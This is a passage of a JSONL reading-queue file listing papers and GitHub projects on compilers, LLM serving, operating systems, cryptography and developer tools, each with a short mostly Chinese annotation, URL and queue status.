sequence 作为 congruence 单位;CFG-native equality saturation 原型。"},"url":"https://arxiv.org/abs/2605.28694","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:01:28.360Z"} +{"slug":"lacuna-program-holes","area":"papers","topic":"compilers-pl","title":"LACUNA: Safe Agents as Recursive Program Holes","meta":{"col3":"2026","col4":"arXiv 2605.28617;agent[T](task) typed call;type-checked rollback;BrowseComp + τ²-bench;Odersky 团队。"},"url":"https://arxiv.org/abs/2605.28617","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:06:31.604Z"} +{"slug":"verus-specgym","area":"papers","topic":"formal-methods","title":"Verus-SpecGym: Agentic Environment for Specification Autoformalization","meta":{"col3":"2026","col4":"arXiv 2605.26457;581 spec-writing tasks;exec_spec 执行测试 + Codeforces hacks;frontier 77.8%。"},"url":"https://arxiv.org/abs/2605.26457","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:11:34.799Z"} +{"slug":"milestone-phase-order","area":"papers","topic":"compilers-pl","title":"MileStone: Multi-Objective Compiler Phase Ordering with GNN+RL","meta":{"col3":"2026","col4":"arXiv 2605.23435;GNN 预测 + RL agent;同 energy budget 下 -45% 执行时间;self-evolving DB。"},"url":"https://arxiv.org/abs/2605.23435","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:16:37.866Z"} +{"slug":"rtp-llm-alibaba","area":"papers","topic":"distributed-systems","title":"RTP-LLM: Alibaba High-Performance LLM Inference Engine","meta":{"col3":"2026","col4":"arXiv 2605.29639;100M users;P/D 解耦 + hierarchical KV cache;4.7x-6.3x model load;35-37% TTFT P95。"},"url":"https://arxiv.org/abs/2605.29639","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:16:37.993Z"} +{"slug":"afd-disagg-moe","area":"papers","topic":"distributed-systems","title":"How Far Can Disaggregation Go? AFD Design-Space for MoE LLM Serving","meta":{"col3":"2026","col4":"arXiv 2605.28302;attention-FFN disagg;DeepSeek-V3.2 4k tok/s under SLO;rack/cluster 设计原则。"},"url":"https://arxiv.org/abs/2605.28302","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:21:40.940Z"} +{"slug":"hkuds-vimax","area":"projects","topic":"machine-learning","title":"HKUDS/ViMax: Agentic Video Generation (Director, Screenwriter, Producer All-in-One)","meta":{"col3":"Python","col4":"GitHub trending 30d;多 agent 协作生成视频;~8.4k stars。"},"url":"https://github.com/HKUDS/ViMax","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"moneyprinter-turbo","area":"projects","topic":"machine-learning","title":"harry0703/MoneyPrinterTurbo: AI 短视频生成","meta":{"col3":"Python","col4":"GitHub trending 30d;~73k stars;TTS+剪辑 pipeline。"},"url":"https://github.com/harry0703/MoneyPrinterTurbo","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"pixelle-video","area":"projects","topic":"machine-learning","title":"AIDC-AI/Pixelle-Video: 自动短视频创作引擎","meta":{"col3":"Python","col4":"GitHub trending 30d;~20.6k stars;阿里达摩院出品。"},"url":"https://github.com/AIDC-AI/Pixelle-Video","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"local-deep-research","area":"projects","topic":"machine-learning","title":"LearningCircuit/local-deep-research: Local LLM 研究 agent","meta":{"col3":"Python","col4":"GitHub trending 30d;~8.2k stars;95% SimpleQA;本地 LLM 替代 OpenAI deep research。"},"url":"https://github.com/LearningCircuit/local-deep-research","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"ai-trader-hkuds","area":"projects","topic":"machine-learning","title":"HKUDS/AI-Trader: 全自动 agent-native 量化交易系统","meta":{"col3":"Python","col4":"GitHub trending 30d;~19k stars;agent-native 金融交易框架。"},"url":"https://github.com/HKUDS/AI-Trader","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"trading-agents-tauric","area":"projects","topic":"machine-learning","title":"TauricResearch/TradingAgents: 多 agent LLM 量化框架","meta":{"col3":"Python","col4":"GitHub trending 30d;~81k stars;multi-agent debate 模拟交易委员会。"},"url":"https://github.com/TauricResearch/TradingAgents","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"hermes-webui","area":"projects","topic":"devtools","title":"nesquena/hermes-webui: Hermes Agent Web/Mobile UI","meta":{"col3":"Python","col4":"GitHub trending 30d;~9.6k stars;agent 操作可视化界面。"},"url":"https://github.com/nesquena/hermes-webui","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"free-claude-code","area":"projects","topic":"devtools","title":"Alishahryar1/free-claude-code: Claude Code 终端访问","meta":{"col3":"Python","col4":"GitHub trending 30d;~31k stars;通过 terminal/VSCode 接入 Claude;合规边界。"},"url":"https://github.com/Alishahryar1/free-claude-code","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"composio-codex-skills","area":"projects","topic":"devtools","title":"ComposioHQ/awesome-codex-skills: Codex skills 精选","meta":{"col3":"Python","col4":"GitHub trending 30d;~12.5k stars;practical skills 集合。"},"url":"https://github.com/ComposioHQ/awesome-codex-skills","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"ruview-wifi-radar","area":"projects","topic":"machine-learning","title":"ruvnet/RuView: WiFi-based 空间智能 + 生命体征监测","meta":{"col3":"Rust","col4":"GitHub trending 30d;~69k stars;非视觉 presence/health 检测。"},"url":"https://github.com/ruvnet/RuView","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"jcode-coding","area":"projects","topic":"devtools","title":"1jehuang/jcode: 自动开发 coding agent harness","meta":{"col3":"Rust","col4":"GitHub trending 30d;~6.7k stars;轻量化 agent 编码框架。"},"url":"https://github.com/1jehuang/jcode","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"iii-hq-platform","area":"projects","topic":"devtools","title":"iii-hq/iii: 服务组合扩展实时观测平台","meta":{"col3":"Rust","col4":"GitHub trending 30d;~17k stars;service composition + observation。"},"url":"https://github.com/iii-hq/iii","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"lean-ctx-mcp","area":"projects","topic":"devtools","title":"yvgude/lean-ctx: Agent cognitive context layer with 62 MCP tools","meta":{"col3":"Rust","col4":"GitHub trending 30d;~2.3k stars;token saving 优化。"},"url":"https://github.com/yvgude/lean-ctx","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"skills-manager-desktop","area":"projects","topic":"devtools","title":"xingkongliang/skills-manager: 跨 15+ coding tool 的 skill 桌面管理","meta":{"col3":"Rust","col4":"GitHub trending 30d;~1.8k stars;skill 跨 agent 共享。"},"url":"https://github.com/xingkongliang/skills-manager","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"brush-3d","area":"projects","topic":"graphics","title":"ArthurBrussee/brush: 3D 重建技术平台","meta":{"col3":"Rust","col4":"GitHub trending 30d;~4.6k stars;Gaussian Splatting 工程实现。"},"url":"https://github.com/ArthurBrussee/brush","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"cc-switch-desktop","area":"projects","topic":"devtools","title":"farion1231/cc-switch: 跨平台多 coding agent 桌面助手","meta":{"col3":"Rust","col4":"GitHub trending 30d;~86k stars;切换 Claude Code / Codex / 其他。"},"url":"https://github.com/farion1231/cc-switch","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"meetily-ai-meeting","area":"projects","topic":"devtools","title":"Zackriya-Solutions/meetily: 隐私优先 AI 会议助手","meta":{"col3":"Rust","col4":"GitHub trending 30d;~12.4k stars;本地处理 + 转录。"},"url":"https://github.com/Zackriya-Solutions/meetily","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"office-view-only-mac","area":"projects","topic":"engineering-culture","title":"Microsoft Office 2019/2021 for Mac view-only conversion (consumer rights)","meta":{"col3":"2026","col4":"HN 905pts;Microsoft 远程把已购永久授权降级为只读;许可与 software 自治讨论。"},"url":"https://consumerrights.wiki/w/Microsoft_Office_2019_and_2021_for_Mac_view-only_conversion_(2026)","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"seashell-desert-algo","area":"projects","topic":"engineering-culture","title":"I found a seashell in the middle of the desert (algorithmic discovery story)","meta":{"col3":"2026","col4":"HN 351pts;GitHub 长帖;算法/数学发现叙事。"},"url":"https://github.com/Hawzen/I-found-a-seashell-in-the-middle-of-the-desert","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"voxel-space-2017","area":"projects","topic":"graphics","title":"Voxel Space (Comanche-style raycaster, 2017)","meta":{"col3":"2017","col4":"HN 291pts;s-macke 经典教学;高度图 raycasting;retro 渲染原理。"},"url":"https://s-macke.github.io/VoxelSpace/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"av2-video-spec","area":"papers","topic":"media","title":"AV2 Video Standard v1.0 (Final Specification)","meta":{"col3":"2026","col4":"HN 252pts;AOMedia AV2 终稿;下一代开源 codec。"},"url":"https://en.wikipedia.org/wiki/AV2","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:21:41.078Z"} +{"slug":"website-specification","area":"projects","topic":"engineering-culture","title":"The Website Specification","meta":{"col3":"2026","col4":"HN 245pts;website 规范半讽刺半认真;W3C/WHATWG 反思。"},"url":"https://specification.website/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"zig-elf-linker-devlog","area":"projects","topic":"compilers-pl","title":"Zig ELF Linker Improvements Devlog","meta":{"col3":"2026","col4":"HN 214pts;Zig 自托管 linker 性能进展;ELF 实现细节。"},"url":"https://ziglang.org/devlog/2026/#2026-05-30","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"racket-v92","area":"projects","topic":"compilers-pl","title":"Racket v9.2 Release","meta":{"col3":"2026","col4":"HN 150pts;Racket 9.2 release notes;CS 教学语言新进展。"},"url":"https://blog.racket-lang.org/2026/05/racket-v9-2.html","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"dotnet-10","area":"projects","topic":"compilers-pl","title":".NET 10 Announcement","meta":{"col3":"2026","col4":"HN 612pts;Microsoft .NET 10;运行时 + GC + AOT 改进。"},"url":"https://devblogs.microsoft.com/dotnet/announcing-dotnet-10/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"xslt-rip","area":"projects","topic":"engineering-culture","title":"XSLT RIP","meta":{"col3":"2026","col4":"HN 698pts;XSLT 在 Web 平台被废弃讨论;语言生命周期案例。"},"url":"https://xslt.rip/","status":"queued","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal"} +{"slug":"scaling-hnsws-antirez","area":"papers","topic":"info-retrieval","title":"Scaling HNSWs (Salvatore Sanfilippo)","meta":{"col3":"2026","col4":"HN 224pts;antirez 分析 HNSW 在 Redis Vector 的工程扩展;in-memory ANN 教学级深度。"},"url":"https://antirez.com/news/156","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:21:41.216Z"} +{"slug":"lampson-hints-1983","area":"papers","topic":"engineering-culture","title":"Hints for Computer System Design (Butler Lampson, 1983)","meta":{"col3":"1983","col4":"SOSP'83;系统设计方法论顶级 reading;CMU 15-712 / MIT 6.5840 必读。"},"url":"https://bwlampson.site/33-Hints/Acrobat.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:26:44.501Z"} +{"slug":"parnas-information-hiding-1972","area":"papers","topic":"engineering-culture","title":"On the Criteria To Be Used in Decomposing Systems into Modules (Parnas, 1972)","meta":{"col3":"1972","col4":"CACM 1972;信息隐藏奠基;模块化设计教科书 + Stanford / MIT reading list。"},"url":"https://www.win.tue.nl/~wstomv/edu/2ip30/references/criteria_for_modularization.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:31:47.754Z"} +{"slug":"brooks-no-silver-bullet-1986","area":"papers","topic":"engineering-culture","title":"No Silver Bullet — Essence and Accident in Software Engineering (Brooks, 1986)","meta":{"col3":"1986","col4":"软件工程必读;本质复杂性 vs 偶然复杂性;CMU 17-313 / Stanford reading list。"},"url":"http://worrydream.com/refs/Brooks-NoSilverBullet.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:36:50.993Z"} +{"slug":"dijkstra-goto-1968","area":"papers","topic":"compilers-pl","title":"Go To Statement Considered Harmful (Dijkstra, 1968)","meta":{"col3":"1968","col4":"CACM 1968;结构化编程奠基;PL 课程 reading list 标配。"},"url":"https://homepages.cwi.nl/~storm/teaching/reader/Dijkstra68.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:26:44.654Z"} +{"slug":"liskov-abstraction-1974","area":"papers","topic":"compilers-pl","title":"Programming with Abstract Data Types (Liskov & Zilles, 1974)","meta":{"col3":"1974","col4":"CLU 语言;ADT 起源;OOP/类型理论必读。"},"url":"https://en.wikipedia.org/wiki/Abstract_data_type","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:31:47.893Z"} +{"slug":"lamport-time-clocks-1978","area":"papers","topic":"distributed-systems","title":"Time, Clocks, and the Ordering of Events in a Distributed System (Lamport, 1978)","meta":{"col3":"1978","col4":"CACM;happens-before;逻辑时钟;MIT 6.5840 / CMU 15-440 第一篇。"},"url":"https://lamport.azurewebsites.net/pubs/time-clocks.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:26:44.797Z"} +{"slug":"hoare-csp-1978","area":"papers","topic":"compilers-pl","title":"Communicating Sequential Processes (Hoare, 1978)","meta":{"col3":"1978","col4":"CACM;CSP;Go channel/Erlang 哲学源头。"},"url":"https://www.cs.cmu.edu/~crary/819-f09/Hoare78.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:36:51.132Z"} +{"slug":"hoare-monitors-1974","area":"papers","topic":"operating-systems","title":"Monitors: An Operating System Structuring Concept (Hoare, 1974)","meta":{"col3":"1974","col4":"CACM;monitor 同步原语;并发原语奠基;OS 课必读。"},"url":"https://en.wikipedia.org/wiki/Monitor_(synchronization)","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:31:48.032Z"} +{"slug":"backus-fp-1978","area":"papers","topic":"compilers-pl","title":"Can Programming Be Liberated from the von Neumann Style? (Backus, 1978 Turing Lecture)","meta":{"col3":"1978","col4":"FP 语言;Turing Award lecture;函数式范式宣言。"},"url":"https://www.cs.cmu.edu/~crary/819-f09/Backus78.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:41:54.283Z"} +{"slug":"knuth-literate-1984","area":"papers","topic":"engineering-culture","title":"Literate Programming (Knuth, 1984)","meta":{"col3":"1984","col4":"Computer Journal;WEB/CWEB;文档与代码一体化哲学。"},"url":"http://www.literateprogramming.com/knuthweb.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R187-2026-05-31","priority_tier":"normal","written_at":"2026-06-13T07:41:54.412Z"} +{"slug":"flashinfer-2024","area":"papers","topic":"ml-systems","title":"FlashInfer: Efficient and Customizable Attention Engine for LLM Inference","meta":{"col3":"2024","col4":"CMU/华盛顿;统一 prefill/decode/CUDA Graph 的 attention kernel 库,vLLM/SGLang 后端"},"url":"https://arxiv.org/abs/2501.01005","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:36:51.270Z"} +{"slug":"mooncake-kvcache-2024","area":"papers","topic":"ml-systems","title":"Mooncake: KVCache-centric Disaggregated Architecture for LLM Serving","meta":{"col3":"2024","col4":"月之暗面;KVCache 池化 + 分离式 prefill/decode,理解长上下文工业实践"},"url":"https://arxiv.org/abs/2407.00079","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:41:54.542Z"} +{"slug":"distserve-2024","area":"papers","topic":"ml-systems","title":"DistServe: Disaggregating Prefill and Decoding for Goodput-optimized LLM Serving","meta":{"col3":"2024","col4":"PKU/UCSD OSDI'24;prefill 和 decode 分离的奠基论文"},"url":"https://arxiv.org/abs/2401.09670","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:46:57.463Z"} +{"slug":"splitwise-2023","area":"papers","topic":"ml-systems","title":"Splitwise: Efficient Generative LLM Inference Using Phase Splitting","meta":{"col3":"2023","col4":"微软研究院;和 DistServe 同期的 prefill/decode 拆分方案"},"url":"https://arxiv.org/abs/2311.18677","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:52:00.624Z"} +{"slug":"sarathi-serve-2024","area":"papers","topic":"ml-systems","title":"Sarathi-Serve: Taming Throughput-Latency Tradeoff in LLM Inference","meta":{"col3":"2024","col4":"微软;chunked-prefill 调度的工业实践,Splitwise 演化"},"url":"https://arxiv.org/abs/2403.02310","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:57:03.713Z"} +{"slug":"torchtitan-2024","area":"projects","topic":"ml-systems","title":"torchtitan","meta":{"col3":"2024","col4":"PyTorch 官方 LLM 训练参考库;FSDP2 + tensor parallel + pipeline 一体化"},"url":"https://github.com/pytorch/torchtitan","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"xformers","area":"projects","topic":"ml-systems","title":"xFormers","meta":{"col3":"2024","col4":"Meta;可组合 transformer 组件 + memory_efficient_attention"},"url":"https://github.com/facebookresearch/xformers","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"flashinfer-project","area":"projects","topic":"ml-systems","title":"flashinfer","meta":{"col3":"2024","col4":"FlashInfer 开源实现;vLLM/SGLang/TensorRT-LLM 共用 kernel"},"url":"https://github.com/flashinfer-ai/flashinfer","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"openrlhf","area":"projects","topic":"ml-systems","title":"OpenRLHF","meta":{"col3":"2024","col4":"Ray + DeepSpeed + vLLM 的 RLHF 训练框架;理解 PPO/DPO 系统拼装"},"url":"https://github.com/OpenRLHF/OpenRLHF","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"verl-volcengine","area":"projects","topic":"ml-systems","title":"verl: Volcano Engine RL for LLMs","meta":{"col3":"2024","col4":"字节;HybridFlow 论文的开源实现,RLHF 系统工程"},"url":"https://github.com/volcengine/verl","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"lottery-scheduling-1994","area":"papers","topic":"operating-systems","title":"Lottery Scheduling: Flexible Proportional-Share Resource Management","meta":{"col3":"1994","col4":"Waldspurger/Weihl OSDI'94;Linux CFS 的概念前身"},"url":"https://www.usenix.org/legacy/publications/library/proceedings/osdi/full_papers/waldspurger.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:46:57.594Z"} +{"slug":"anticipatory-scheduler-2001","area":"papers","topic":"operating-systems","title":"Anticipatory Scheduling: A Disk Scheduling Framework","meta":{"col3":"2001","col4":"Iyer/Druschel SOSP'01;理解 Linux I/O 调度器历史"},"url":"https://www.cs.rice.edu/~druschel/publications/anticipatory.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:52:00.757Z"} +{"slug":"epoch-based-reclamation-2007","area":"papers","topic":"operating-systems","title":"Practical Lock-Freedom: Epoch-based Reclamation","meta":{"col3":"2007","col4":"Fraser/Harris;Hazard Pointer 的替代方案,crossbeam-epoch 基础"},"url":"https://www.cl.cam.ac.uk/research/srg/netos/papers/2007-cpwl.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:57:03.848Z"} +{"slug":"seastar-shared-nothing-2014","area":"papers","topic":"operating-systems","title":"Seastar: Shared-Nothing Asynchronous Framework","meta":{"col3":"2014","col4":"ScyllaDB;per-core thread + futures,DPDK 风格内核绕过"},"url":"https://seastar.io/shared-nothing/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:02:06.928Z"} +{"slug":"k42-research-os-2006","area":"papers","topic":"operating-systems","title":"K42: Building a Complete Operating System","meta":{"col3":"2006","col4":"IBM;面向多核可扩展的研究 OS,对象模型 + hot-swap"},"url":"https://dl.acm.org/doi/10.1145/1218063.1217949","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:07:10.169Z"} +{"slug":"snmalloc-2019","area":"papers","topic":"operating-systems","title":"snmalloc: A Message Passing Allocator","meta":{"col3":"2019","col4":"微软;线程消息传递回收,跨线程 free 不阻塞"},"url":"https://github.com/microsoft/snmalloc/blob/main/snmalloc.pdf","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"dpdk-project","area":"projects","topic":"operating-systems","title":"DPDK","meta":{"col3":"2024","col4":"Intel;用户态网络栈/轮询模式,云厂商高性能网关基础"},"url":"https://www.dpdk.org/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"spdk-project","area":"projects","topic":"operating-systems","title":"SPDK","meta":{"col3":"2024","col4":"Intel;用户态 NVMe 存储栈,DPDK 的存储版"},"url":"https://spdk.io/","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"rust-for-linux","area":"projects","topic":"operating-systems","title":"Rust for Linux","meta":{"col3":"2024","col4":"Linux 6.x 起官方支持,理解内核语言策略"},"url":"https://github.com/Rust-for-Linux/linux","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"aya-rs-ebpf","area":"projects","topic":"operating-systems","title":"aya: Rust eBPF library","meta":{"col3":"2024","col4":"纯 Rust eBPF 框架;理解新一代 eBPF 工具链"},"url":"https://github.com/aya-rs/aya","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"aes-gcm-2003","area":"papers","topic":"security-privacy","title":"The Galois/Counter Mode of Operation (GCM)","meta":{"col3":"2003","col4":"McGrew/Viega;AES-GCM 的 NIST 草案,TLS 1.3 主流模式"},"url":"https://csrc.nist.gov/csrc/media/projects/block-cipher-techniques/documents/bcm/proposed-modes/gcm/gcm-spec.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:46:57.721Z"} +{"slug":"hkdf-rfc5869","area":"papers","topic":"security-privacy","title":"HKDF: HMAC-based Extract-and-Expand Key Derivation Function","meta":{"col3":"2010","col4":"Krawczyk RFC 5869;TLS/Noise 共用的密钥派生标准"},"url":"https://www.rfc-editor.org/rfc/rfc5869","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:52:00.890Z"} +{"slug":"ed25519-2011","area":"papers","topic":"security-privacy","title":"High-speed High-security Signatures (Ed25519)","meta":{"col3":"2011","col4":"Bernstein 等;现代签名标准,age/SSH/SecureScuttlebutt 用"},"url":"https://ed25519.cr.yp.to/ed25519-20110926.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:57:03.977Z"} +{"slug":"argon2-2015","area":"papers","topic":"security-privacy","title":"Argon2: The Memory-Hard Function for Password Hashing","meta":{"col3":"2015","col4":"PHC 获胜算法;现代 KDF/密码哈希"},"url":"https://password-hashing.net/argon2-specs.pdf","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:02:07.061Z"} +{"slug":"noise-explorer-2018","area":"papers","topic":"security-privacy","title":"Noise Explorer: Fully Automated Modeling of Noise Protocol","meta":{"col3":"2018","col4":"Kobeissi;理解 WireGuard/Wickr 的协议族"},"url":"https://noiseexplorer.com/","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:07:10.300Z"} +{"slug":"trivy-aquasec","area":"projects","topic":"security-privacy","title":"Trivy","meta":{"col3":"2024","col4":"Aqua Security;最广用的容器/IaC/SBOM 漏洞扫描器"},"url":"https://github.com/aquasecurity/trivy","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"semgrep-r2c","area":"projects","topic":"security-privacy","title":"Semgrep","meta":{"col3":"2024","col4":"r2c;轻量静态分析 SAST,规则即代码"},"url":"https://github.com/semgrep/semgrep","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"step-ca-smallstep","area":"projects","topic":"security-privacy","title":"step-ca","meta":{"col3":"2024","col4":"Smallstep;私有 CA 自托管 + ACME,零信任部署"},"url":"https://github.com/smallstep/certificates","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"teleport-gravitational","area":"projects","topic":"security-privacy","title":"Teleport","meta":{"col3":"2024","col4":"Gravitational;统一 SSH/K8s/DB 接入控制,零信任审计"},"url":"https://github.com/gravitational/teleport","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} +{"slug":"salsa-incremental-2019","area":"papers","topic":"editors-ide","title":"Salsa: An Incremental Computation Framework","meta":{"col3":"2019","col4":"rust-analyzer 核心;Adapton 的工程化版本"},"url":"https://github.com/salsa-rs/salsa/blob/master/book/src/about_salsa.md","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T07:57:04.106Z"} +{"slug":"dap-spec","area":"papers","topic":"editors-ide","title":"Debug Adapter Protocol Specification","meta":{"col3":"2018","col4":"微软;与 LSP 并列的调试通用协议"},"url":"https://microsoft.github.io/debug-adapter-protocol/specification","status":"written","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail","written_at":"2026-06-13T08:02:07.196Z"} +{"slug":"lapce-editor","area":"projects","topic":"editors-ide","title":"Lapce","meta":{"col3":"2024","col4":"Rust + Druid;融合 Vim/VSCode 的现代编辑器"},"url":"https://github.com/lapce/lapce","status":"queued","claimed_by":null,"attempts":0,"source_file":"topic-targeted-r3-2026-05-31","priority_tier":"long-tail"} 